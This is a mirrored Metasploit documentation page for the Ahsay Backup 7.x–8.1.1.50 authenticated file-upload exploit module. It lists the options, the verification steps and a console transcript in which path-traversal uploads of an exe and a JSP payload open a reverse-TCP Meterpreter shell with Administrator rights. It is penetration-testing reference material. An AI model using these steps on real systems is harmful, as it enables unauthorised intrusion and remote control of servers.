CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md
Views: 1904

Vulnerable Application

Ahsay Backup v7.x - v8.1.1.50 Download the vulnerable version: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe Start the application ( I start it manually from C:\Program Files\AhsayCBS\bin\startup.bat)

Verification Steps

  1. Start msfconsole

  2. use exploit/windows/misc/ahsay_fileupload

  3. enable create trial account set CREATEACCOUNT true

  4. set RHOST set RHOST 172.16.238.175

  5. set LHOST set LHOST 172.16.238.235

  6. run exploit run

  7. We should receive a meterpreter shell.

Options

CREATEACCOUNT - Create a Trial account, use this when trial accounts is enabled and you do not have a valid credentials. PASSWORD - Password to Ahsay useraccount, if CREATEACCOUNT is set this password will be used. RHOST - Target address. RPORT - The target port (TCP). TARGETURI - Path to Ahsay installation UPLOADPATH - Path to where the file should be uploaded USERNAME - Username to Ahsay account, if CREATEACCOUNT is set this username will be used.

Scenarios

Ahsay 8.1.1.50 on Windows 2003 SP2

msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
CREATEACCOUNT => true
msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175
RHOST => 172.16.238.175
msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235
LHOST => 172.16.238.235
msf exploit(windows/misc/ahsay_fileupload) > run

[*] Started reverse TCP handler on 172.16.238.235:4444 
[+] Username and password are valid!
[+] No need to create account, already exists!
[*] Uploading payload
[+] Successfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe
[*] Uploading payload
[+] Successfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp
[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp
[+] Exploit executed!
[*] Sending stage (179779 bytes) to 172.16.238.175
[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target

meterpreter > getuid
Server username: AHSAY-123\Administrator